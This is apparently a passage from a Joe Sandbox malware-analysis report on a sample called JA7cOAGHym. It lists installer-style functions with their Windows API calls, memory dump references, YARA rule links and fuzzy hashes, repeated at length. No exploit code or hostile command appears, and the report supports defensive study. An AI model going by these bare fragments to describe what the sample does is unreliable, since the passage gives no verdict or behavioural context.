                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                      • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                      Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                      Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                      Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                      • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                      • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                      Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                      • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                      • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                      Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                      • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                      • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                      • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                      Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                      • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                      • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                      • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                      Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                      • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                      • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                      • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                      Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                      • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                      Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
